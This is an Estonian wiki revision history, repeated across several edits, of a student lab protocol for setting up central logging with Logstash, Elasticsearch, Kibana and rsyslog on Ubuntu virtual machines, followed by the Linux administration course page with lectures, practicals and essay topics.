exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf
end script
</source>

Loon kausta /var/log/logstash ja kasutaja nimega logstash

<source lang="bash">
mkdir /var/log/logstash
adduser --system --disabled-password --no-create-home --group --quiet logstash
usermod -a -G adm logstash
</source>

Muudan vajalike kaustade omanikuks kasutaja nimega "logstash" ja grupi "adm"

<source="bash">
chown -R logstash:adm /etc/logstash/
chown -R logstash:adm /var/log/logstash/
</source>

=== Elasticsearch ===
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.

<source lang="bash">
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb
dpkg -i elasticsearch-0.90.0.deb
rm elasticsearch-0.90.0.deb
</source>

Teenuse käivitamine

<source lang="bash">
service elasticsearch start
</source>

=== Kibana ===
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.

<source lang="bash">
apt-get install ruby1.9.3 rubygems

wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz
tar -zxf v0.2.0.tar.gz
mv Kibana-0.2.0/ /etc/kibana
rm v0.2.0.tar.gz
cd /etc/kibana
gem install bundler
bundle install
</source>

Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat "KibanaHost" stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.

<source lang="bash">
KibanaHost = ‘192.168.56.210’
</source>

Loon upstarti kirje kibana automaatseks käivitamiseks

<source lang="bash">
nano /etc/init/kibana.conf
</source>

Faili sisu:

<source lang="bash">
# kibana.conf# kibana - log viewer
description "Kibana logstash viewer"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

# Environment
env HOME=/etc/kibana/
chdir /etc/kibana
setuid logstash
setgid adm
console log

# Run Kibana, which is in /etc/kibana
script
ruby /etc/kibana/kibana.rb
end script

</source>

Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.

== Kliendi seadistamine ==
Kliendiks Ubuntu client 64bit. Kasutusel sama klient, mis samas aines puppeti laboris kliendina.

=== Rsyslog ===
Rsyslog on Linux/UNIX masina jaoks logiklient, mis saadab logisid edasi seadistatud serverile. Kui rsyslogi seadistatud poleks, saab seda teha kasutades käsku

<source lang="bash">
apt-get install rsyslog
</source>

Muudan kliendis rsyslogi konfiguratsioonifaili

<source lang="bash">
nano /etc/rsyslog.conf
</source>

Lisasin TCP kommentaaride juurde rea, mis saadab üle TCP protokolli logid määratud ip-aadressi suunas.

<source lang="bash">
*.* @@192.168.56.210:10514
</source>

Seletused:

*.* kõik logifailid

@@ - kasutades TCP protokolli (@ - UDP protokoll) - miks kasutada TCP-d? Kuna TCP on kindlam ja turvalisem, ei lase andmekaol tekkida.

192.168.56.210 - "logimassin" serveri ip-aadress

10514 - logide saatmise ja vastuvõtmise port

Kliendil on vaja rsyslogi jaoks teha taaskäivitus. Seda saab teha kas masinat taaskäivitades või kasutades käsku

<source lang="bash">
service rsyslog restart
</source>

= Ligipääs ja testimine =
Veebiliidesest on võimalik keskkond avada, kui trükkida sisse aadress http://192.168.56.210:5601. Mina aga lisasin kliendi masina hosts faili kirje

<source lang="bash">
192.168.56.210 logimassin.planet.zz logimassin
</source>

Avades liidese näen nii serverist (logimassin) kui ka kliendist (client) tulnud logisid. Et asja illustreerida enda jaoks veelgi, panin käima serveri (puppet) ja läbi Kibana veebiliidese lugesin välja, mis kliendi logifailis tekkis, kui puppet saatis sinna mingeid uuendusi.

Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll

2013-11-28T11:31:53Z

Saus:

Labor 2 protokoll - keskse logihalduse rakendamine

Sten Aus

A32

28.11.2013

Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]

= Ülesande püstitus =
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.

Server: Ubuntu Server 64bit, '''versioon'''

Klient: Ubuntu client 64bit, '''versioon'''

Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|"Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses"] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].

= Kasutatud tarkvara =
Logstash, elasticsearch, kibana

Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna kibana versioon 3 on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.

= Protokoll =

== Serveri seadistamine ==
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).

Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.

/etc/hostname failis asendasin masina nimeks '"logimassin"'. Koos domeeninimega on masina nimi "logimassin.planet.zz" (FQDN).

=== Logstash ===
Kasutatud S. Arnus lahendust

<source lang="bash">
apt-get install openjdk-7-jre
mkdir /etc/logstash

wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar
</source>

Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.

<source lang="bash">
input {
#Linux/Unix süsteemidest tulevad logid
tcp {
type => "syslog-tcp"
port => 10514
}
#Logiserveri enda logid
file {
type => "logserver"
path => [ "/var/log/syslog", "/var/log/*.log" ]
}
}

output {
#Saadetakse andmebaasi
elasticsearch {
}
}

</source>

Loon automaatse käivituse jaoks kirje ''upstart''i

<source lang="bash">
nano /etc/init/logstash-server.conf
</source>

<source lang="bash">
# logstash server instance
description "logstash server instance"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

env HOME=/etc/logstash
chdir /etc/logstash
setuid logstash
setgid adm
console log

#Minimaalne ja maksimaalne javale lubatud mälumaht
#env JAVA_OPTS='-Xms512m -Xmx512m'

script
exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf
end script
</source>

Loon kausta /var/log/logstash ja kasutaja nimega logstash

<source lang="bash">
mkdir /var/log/logstash
adduser --system --disabled-password --no-create-home --group --quiet logstash
usermod -a -G adm logstash
</source>

Muudan vajalike kaustade omanikuks kasutaja nimega "logstash" ja grupi "adm"

<source="bash">
chown -R logstash:adm /etc/logstash/
chown -R logstash:adm /var/log/logstash/
</source>

=== Elasticsearch ===
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.

<source lang="bash">
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb
dpkg -i elasticsearch-0.90.0.deb
rm elasticsearch-0.90.0.deb
</source>

Teenuse käivitamine

<source lang="bash">
service elasticsearch start
</source>

=== Kibana ===
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.

<source lang="bash">
apt-get install ruby1.9.3 rubygems

wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz
tar -zxf v0.2.0.tar.gz
mv Kibana-0.2.0/ /etc/kibana
rm v0.2.0.tar.gz
cd /etc/kibana
gem install bundler
bundle install
</source>

Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat "KibanaHost" stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.

<source lang="bash">
KibanaHost = ‘192.168.56.210’
</source>

Loon upstarti kirje kibana automaatseks käivitamiseks

<source lang="bash">
nano /etc/init/kibana.conf
</source>

Faili sisu:

<source lang="bash">
# kibana.conf# kibana - log viewer
description "Kibana logstash viewer"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

# Environment
env HOME=/etc/kibana/
chdir /etc/kibana
setuid logstash
setgid adm
console log

# Run Kibana, which is in /etc/kibana
script
ruby /etc/kibana/kibana.rb
end script

</source>

Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.

== Kliendi seadistamine ==
Kliendiks Ubuntu client 64bit. Kasutusel sama klient, mis samas aines puppeti laboris kliendina.

=== Rsyslog ===
Rsyslog on Linux/UNIX masina jaoks logiklient, mis saadab logisid edasi seadistatud serverile. Kui rsyslogi seadistatud poleks, saab seda teha kasutades käsku

<source lang="bash">
apt-get install rsyslog
</source>

Muudan kliendis rsyslogi konfiguratsioonifaili

<source lang="bash">
nano /etc/rsyslog.conf
</source>

Lisasin TCP kommentaaride juurde rea, mis saadab üle TCP protokolli logid määratud ip-aadressi suunas.

<source lang="bash">
*.* @@192.168.56.210:10514
</source>

Seletused:

*.* kõik logifailid

@@ - kasutades TCP protokolli (@ - UDP protokoll) - miks kasutada TCP-d? Kuna TCP on kindlam ja turvalisem, ei lase andmekaol tekkida.

192.168.56.210 - "logimassin" serveri ip-aadress

10514 - logide saatmise ja vastuvõtmise port

Kliendil on vaja rsyslogi jaoks teha taaskäivitus. Seda saab teha kas masinat taaskäivitades või kasutades käsku

<source lang="bash">
service rsyslog restart
</source>

= Ligipääs ja testimine =
Veebiliidesest on võimalik keskkond avada, kui trükkida sisse aadress http://192.168.56.210:5601. Mina aga lisasin kliendi masina hosts faili kirje

<source lang="bash">
192.168.56.210 logimassin.planet.zz logimassin
</source>

Avades liidese näen nii serverist (logimassin) kui ka kliendist (client) tulnud logisid. Et asja illustreerida enda jaoks veelgi, panin käima serveri (puppet) ja läbi Kibana veebiliidese lugesin välja, mis kliendi logifailis tekkis, kui puppet saatis sinna mingeid uuendusi.

Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll

2013-11-28T11:30:11Z

Saus:

Labor 2 protokoll - keskse logihalduse rakendamine

Sten Aus

A32

28.11.2013

Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]

= Ülesande püstitus =
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.

Server: Ubuntu Server 64bit, '''versioon'''

Klient: Ubuntu client 64bit, '''versioon'''

Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|"Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses"] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].

= Kasutatud tarkvara =
Logstash, elasticsearch, kibana

Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna kibana versioon 3 on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.

= Protokoll =
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).

Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.

/etc/hostname failis asendasin masina nimeks '"logimassin"'. Koos domeeninimega on masina nimi "logimassin.planet.zz" (FQDN).

== Logstash ==
Kasutatud S. Arnus lahendust

<source lang="bash">
apt-get install openjdk-7-jre
mkdir /etc/logstash

wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar
</source>

Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.

<source lang="bash">
input {
#Linux/Unix süsteemidest tulevad logid
tcp {
type => "syslog-tcp"
port => 10514
}
#Logiserveri enda logid
file {
type => "logserver"
path => [ "/var/log/syslog", "/var/log/*.log" ]
}
}

output {
#Saadetakse andmebaasi
elasticsearch {
}
}

</source>

Loon automaatse käivituse jaoks kirje ''upstart''i

<source lang="bash">
nano /etc/init/logstash-server.conf
</source>

<source lang="bash">
# logstash server instance
description "logstash server instance"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

env HOME=/etc/logstash
chdir /etc/logstash
setuid logstash
setgid adm
console log

#Minimaalne ja maksimaalne javale lubatud mälumaht
#env JAVA_OPTS='-Xms512m -Xmx512m'

script
exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf
end script
</source>

Loon kausta /var/log/logstash ja kasutaja nimega logstash

<source lang="bash">
mkdir /var/log/logstash
adduser --system --disabled-password --no-create-home --group --quiet logstash
usermod -a -G adm logstash
</source>

Muudan vajalike kaustade omanikuks kasutaja nimega "logstash" ja grupi "adm"

<source="bash">
chown -R logstash:adm /etc/logstash/
chown -R logstash:adm /var/log/logstash/
</source>

== Elasticsearch ==
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.

<source lang="bash">
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb
dpkg -i elasticsearch-0.90.0.deb
rm elasticsearch-0.90.0.deb
</source>

Teenuse käivitamine

<source lang="bash">
service elasticsearch start
</source>

== Kibana ==
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.

<source lang="bash">
apt-get install ruby1.9.3 rubygems

wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz
tar -zxf v0.2.0.tar.gz
mv Kibana-0.2.0/ /etc/kibana
rm v0.2.0.tar.gz
cd /etc/kibana
gem install bundler
bundle install
</source>

Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat "KibanaHost" stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.

<source lang="bash">
KibanaHost = ‘192.168.56.210’
</source>

Loon upstarti kirje kibana automaatseks käivitamiseks

<source lang="bash">
nano /etc/init/kibana.conf
</source>

Faili sisu:

<source lang="bash">
# kibana.conf# kibana - log viewer
description "Kibana logstash viewer"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

# Environment
env HOME=/etc/kibana/
chdir /etc/kibana
setuid logstash
setgid adm
console log

# Run Kibana, which is in /etc/kibana
script
ruby /etc/kibana/kibana.rb
end script

</source>

Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.

== Kliendi seadistamine ==
Rsyslog on Linux/UNIX masina jaoks logiklient, mis saadab logisid edasi seadistatud serverile. Kui rsyslogi seadistatud poleks, saab seda teha kasutades käsku

<source lang="bash">
apt-get install rsyslog
</source>

Muudan kliendis rsyslogi konfiguratsioonifaili

<source lang="bash">
nano /etc/rsyslog.conf
</source>

Lisasin TCP kommentaaride juurde rea, mis saadab üle TCP protokolli logid määratud ip-aadressi suunas.

<source lang="bash">
*.* @@192.168.56.210:10514
</source>

Seletused:

*.* kõik logifailid

@@ - kasutades TCP protokolli (@ - UDP protokoll) - miks kasutada TCP-d? Kuna TCP on kindlam ja turvalisem, ei lase andmekaol tekkida.

192.168.56.210 - "logimassin" serveri ip-aadress

10514 - logide saatmise ja vastuvõtmise port

Kliendil on vaja rsyslogi jaoks teha taaskäivitus. Seda saab teha kas masinat taaskäivitades või kasutades käsku

<source lang="bash">
service rsyslog restart
</source>

= Ligipääs ja testimine =
Veebiliidesest on võimalik keskkond avada, kui trükkida sisse aadress http://192.168.56.210:5601. Mina aga lisasin kliendi masina hosts faili kirje

<source lang="bash">
192.168.56.210 logimassin.planet.zz logimassin
</source>

Avades liidese näen nii serverist (logimassin) kui ka kliendist (client) tulnud logisid. Et asja illustreerida enda jaoks veelgi, panin käima serveri (puppet) ja läbi Kibana veebiliidese lugesin välja, mis kliendi logifailis tekkis, kui puppet saatis sinna mingeid uuendusi.

Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll

2013-11-28T11:23:34Z

Saus: /* Kasutatud tarkvara */

Labor 2 protokoll - keskse logihalduse rakendamine

Sten Aus

A32

28.11.2013

Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]

= Ülesande püstitus =
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.

Server: Ubuntu Server 64bit, '''versioon'''

Klient: Ubuntu client 64bit, '''versioon'''

Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|"Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses"] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].

= Kasutatud tarkvara =
Logstash, elasticsearch, kibana

Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna kibana versioon 3 on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.

= Protokoll =
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).

Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.

/etc/hostname failis asendasin masina nimeks '"logimassin"'. Koos domeeninimega on masina nimi "logimassin.planet.zz" (FQDN).

== Logstash ==
Kasutatud S. Arnus lahendust

<source lang="bash">
apt-get install openjdk-7-jre
mkdir /etc/logstash

wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar
</source>

Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.

<source lang="bash">
input {
#Linux/Unix süsteemidest tulevad logid
tcp {
type => "syslog-tcp"
port => 10514
}
#Logiserveri enda logid
file {
type => "logserver"
path => [ "/var/log/syslog", "/var/log/*.log" ]
}
}

output {
#Saadetakse andmebaasi
elasticsearch {
}
}

</source>

Loon automaatse käivituse jaoks kirje ''upstart''i

<source lang="bash">
nano /etc/init/logstash-server.conf
</source>

<source lang="bash">
# logstash server instance
description "logstash server instance"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

env HOME=/etc/logstash
chdir /etc/logstash
setuid logstash
setgid adm
console log

#Minimaalne ja maksimaalne javale lubatud mälumaht
#env JAVA_OPTS='-Xms512m -Xmx512m'

script
exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf
end script
</source>

Loon kausta /var/log/logstash ja kasutaja nimega logstash

<source lang="bash">
mkdir /var/log/logstash
adduser --system --disabled-password --no-create-home --group --quiet logstash
usermod -a -G adm logstash
</source>

Muudan vajalike kaustade omanikuks kasutaja nimega "logstash" ja grupi "adm"

<source="bash">
chown -R logstash:adm /etc/logstash/
chown -R logstash:adm /var/log/logstash/
</source>

== Elasticsearch ==
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.

<source lang="bash">
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb
dpkg -i elasticsearch-0.90.0.deb
rm elasticsearch-0.90.0.deb
</source>

Teenuse käivitamine

<source lang="bash">
service elasticsearch start
</source>

== Kibana ==
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.

<source lang="bash">
apt-get install ruby1.9.3 rubygems

wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz
tar -zxf v0.2.0.tar.gz
mv Kibana-0.2.0/ /etc/kibana
rm v0.2.0.tar.gz
cd /etc/kibana
gem install bundler
bundle install
</source>

Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat "KibanaHost" stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.

<source lang="bash">
KibanaHost = ‘192.168.56.210’
</source>

Loon upstarti kirje kibana automaatseks käivitamiseks

<source lang="bash">
nano /etc/init/kibana.conf
</source>

Faili sisu:

<source lang="bash">
# kibana.conf# kibana - log viewer
description "Kibana logstash viewer"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

# Environment
env HOME=/etc/kibana/
chdir /etc/kibana
setuid logstash
setgid adm
console log

# Run Kibana, which is in /etc/kibana
script
ruby /etc/kibana/kibana.rb
end script

</source>

Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.

== Kliendi seadistamine ==

= Ligipääs ja testimine =
Veebiliidesest on võimalik ligi

http://192.168.56.210:5601

KLIENT

Rsyslog on juba paigaldatud, kui aga ei oleks
apt-get install rsyslog

nano /etc/rsyslog.conf
TCP juurde kuskile panin
*.* @@192.168.56.210:10514

kaks @ märki garanteerib selle, et teateid saadetakse TCP protokolli kaudu (turvaline, QoS)

ja lõpuks
service rsyslog restart

ja brauserist näen erinevaid logisid mõlemast serverist

panin ka puppetmaster serveri käima, et klienti tuleks puppeti logid - tulidki.

Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll

2013-11-28T11:10:56Z

Saus: /* Ülesande püstitus */

Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll

2013-11-28T11:10:32Z

Saus: /* Ülesande püstitus */

Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll

2013-11-28T11:04:22Z

Saus: /* Ülesande püstitus */

Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll

2013-11-28T11:04:12Z

Saus:

Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll

2013-11-28T11:01:16Z

Saus:

Labor 2 protokoll - keskse logihalduse rakendamine

Sten Aus

A32

28.11.2013

Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]

Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll

2013-11-28T11:00:32Z

Saus: Created page with "Labor 2 protokoll - keskse logihalduse rakendamine Sten Aus A32 28.11.2013"

Labor 2 protokoll - keskse logihalduse rakendamine
Sten Aus
A32
28.11.2013

Linuxi administreerimine

2013-11-28T11:00:08Z

Saus: /* Keskne logiserver */

=Üldinfo=
ECTS: 4
Hindamisviis: Eksam

==Õppejõud==
Margus Ernits

Katrin Loodus

=Eeldused ja sihtgrupp=

Operatsioonisüsteemide administreerimine ja sidumine (Rangelt soovituslik). Osadmin aines loetava oskamine on antud aine õppimise eelduseks. ÕISis on see eeldus märgitud soovituslikuks, kuna igal aastal on paar inimest, kes suudavad mõlemad ained korraga läbida ja on antud vallas väga pädevad.
Linuxi administraatori kursus on mõeldud tugeva infotehnoloogilise põhjaga arvuti-spetsialistile.
Kursuse rõhk on eelkõige võrguhalduril, kelle tööülesannete hulka kuulub igapäevane serverite, võrgu jms hooldus, konfigureerimine ja uute seadmete installatsioon.

=Eesmärk ja sisu=

Kursuse esimeses osas õpitakse tundma Linux süsteemi toimimist, antakse ülevaade administreerimistoimingute automatiseerimisest shelli skriptide abil ja omandatakse praktiline käsufailide koostamise kogemus.

Teises osas õpitakse paigaldama ja konfigureerima erinevaid võrguteenuseid. Kursuse teise osa alguses korratakse taseme ühtlustamiseks TCP/IP võrgu põhialuseid.

=Õpiväljundid=

=Loengud=

Kaugõppe loengute ja praktikumide videosalvestused:
http://echo360.e-ope.ee/ess/portal/section/4bd0abde-1b0d-4c92-a35e-0f99a81f069d

1. Sissejuhatav loeng eeldustest [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng01%20-%20Sissejuhatus%20ainesse%20Linux%20administreerimine%20-%202013%20.pdf Sissejuhatus Loeng 1]

2. Kordamine Osadmin [http://elab.itcollege.ee:8000/Linux-Basics.mm]

3. Linux süsteemi põhilised komponendid [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng02%20-%20Linux%20s%c3%bcsteemide%20haldamine%20-%202013%20.pdf Linux haldamine Loeng 2]

4. Linux süsteemi haldamine puppet abil [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng03%20-%20Linux%20s%c3%bcsteemide%20haldamine%20-%202013%20.pdf Linux haldamine Loeng 3]

5. Linux süsteemi haldamine puppet abil [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng04%20-%20Linux%20s%c3%bcsteemide%20haldamine%20II%20-%202013%20.pdf Linux haldamine Loeng 4]

Puppeti teise loengu video: http://elab.itcollege.ee:8000/linux-admin/pupppet-algus.ogv

=Praktikumid=

==Esimene praktikum - Ubuntu Serveri ja kliendi paigaldamine ning kordamine==
* Paigaldage '''Ubuntu Linux Server''' süsteem VirtualBox abil
**RAM 512MB
**HDD dynamicly allocated 8GB
**2 Võrgukaarti NIC1 - NAT (eth0 - Ubuntus) ja NIC2 - HostOnly (eth1 - Ubuntus)
**Logige serverisse sisse ja seadistage võrk failis /etc/network/interfaces (liidese eth1 ip aadress 192.168.56.200).
***Abiinfo [[Ubuntu server võrgu seadistamine]] ja [[VirtualBoxi võrgud]]

<source lang="bash">
auto eth1
iface eth1 inet static
address 192.168.56.200
netmask 255.255.255.0
</source>

*Paigaldage openssh server, kui te seda installi käigus ei teinud (apt-get update && apt-get install ssh)

Ubuntu Server 12.04.1 LTS ISO (64bit) http://elab.itcollege.ee:8000/ubuntu-12.04.1-server-amd64.iso

Eelduste kontrollimise test harjutamiseks: http://goo.gl/73xBZ
Kes tunneb, et test on '''liiga keeruline''', peab '''kaaluma''' aine deklareerimise asemel '''Osadmin aine (mis on soovituslik eeldus) läbimist'''.

* '''Ubuntu Desktop Linux''' paigaldamine (Võib paigaldada ka mõne muu disrtibutsiooni desktop masina, kuna seda läheb meil niikuinii hiljem vaja)
**Memory 1024MB
**HDD 16GB (või 8GB) Dynamic disk
**Network
**Video Memory 64MB 3D acceleration sisse

'''NB! Kasutamiseks valmis masinad: [http://elab.itcollege.ee:8000/ubuntu-server-64.ova server 64bit] ja [http://elab.itcollege.ee:8000/ubuntu-desktop-64.ova klient 64bit], [http://elab.itcollege.ee:8000/UbuntuServer32bit.ova server 32bit] ja [http://elab.itcollege.ee:8000/UbuntuDesktop32bit.ova klient 32bit]'''

Pärast paigaldamist seadistada [https://wiki.itcollege.ee/index.php/OpenSSH:_v%C3%B5tmetega_autentimine key based autentimisega] serverisse sisenemine. (tööjaamast saab serveris käske käivitada)

==Teine ja kolmas praktikum - Eeldustetest ja kordamine==

Kordamiseks leiate vajalikku infot [https://wiki.itcollege.ee/index.php/Category:Operatsioonis%C3%BCsteemide_administreerimine_ja_sidumine Operatsioonisüsteemide administreerimise ja sidumise] aine vikist.

[http://goo.gl/AFGfoV Eeldustetest 1]

[http://goo.gl/F0PiWK Eeldustetest 2]

==Linux keskhaldus puppet baasil==

Praktikumis paigaldame puppet serveri (master) ja kliendi.

Näiteülesanded kaitsmiseks

1. Loo puppet abil fail /etc/issue sisuga KALA

2. Loo puppet abil kasutaja polekala, kodukaustaga /home/polekala, shelliga /bin/zsh ( tee ka paki zsh paigaldus)

3. Lisa nodele class tarkvara, mis paigaldab htop, bpython pakid

4. Loo nodele class eemalda, mis eemaldab paki cowsay

5. Viimane ülesanne on igal ühel erinev.

5.1 Loo serverisse kasutaja kala ja tee talle ssh key. Seadista kliendiarvuti selliselt, et paigaldataks pakk ssh ja lisataks root kasutajale kliendis loodud ssh public key.

5.2 Paigalda kliendi arvutisse ntp server ja määra ntp serveriteks ntp.eenet.ee ja ntp.ut.ee

5.3 Lisa kliendi arvutisse apache2 veebiserver koos virtualhostiga www.planet.zz, (failis /var/www/www.planet.zz/index.html on rida www.planet.zz)
Apache konfis peab olema ServerName www.planet.zz ja sites-enabled all sait www.planet.zz

==Keskne logiserver==
Labor 2 üheks võimalikuks teemaks on keskse logihalduse lahenduse loomine

[[Keskse logilahenduse rakendamine]]

[http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf Lõputöö logihalduse teemal]

http://rdstash.blogspot.com/2013/01/installing-logstash-as-syslog-server-on.html

[[Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll]] - Sten Aus 28.11.2013

=Esseede teemad 2012=

Võib valida keerulisemaid teemasid ka [[Osadmin referaadi teemad]] lehelt.

[[zsh]] - pole algajale

Mida uurida

Prompt

http://zshwiki.org/home/config/prompt

http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/

.zshrc

for

if

while

jne

[[exFAT vs Linux]] - Kalju Hõbemäe

[[CentOS Server]] --- teeb Oliver Naaris

Paigaldamine

Teenuste DNS, apache2, samba, e-post seadistamine

[[Superb Mini Server]] --- Mark-Erik Mogom, Andrus Dei

Paigaldamine

DNS, samba, LDAP, e-post seadistamine

[[Oracle Linux]]

Paigaldamine

Teenuste DNS, apache2, samba, e-post seadistamine

[[Suse Linux]]

Paigaldamine

Teenuste DNS, apache2, samba seadistamine

[[OpenLDAP Ubuntu Serveril]] - Tarmo Suurmägi, Taavi Sannik, Harri Uljas

[[Zentyal SAMBA4]] --- Lang & Lihten A31

Samba4 domeenikontrolleri seadistamine ja ubuntu/fedora/muu süsteem autentimise seadistamine kasutades uusi vahendeid

[[Apt-yum/dpkg-rpm käskude lühivõrdlus]] - Teet Saar A32

[[Ophcrack]] - teeb Kristo Kapten

[[rancid]] - Meelis Kurnikov, Aive Haavel AK31

[[zenoss]] - Kristjan Vaik

[[Apache autentimine LDAP'iga]] - Rauno Lehiste

=Eksamist=

Tee ära labor 2 (oma valitud teemal + selle kohta wiki kirjatöö)
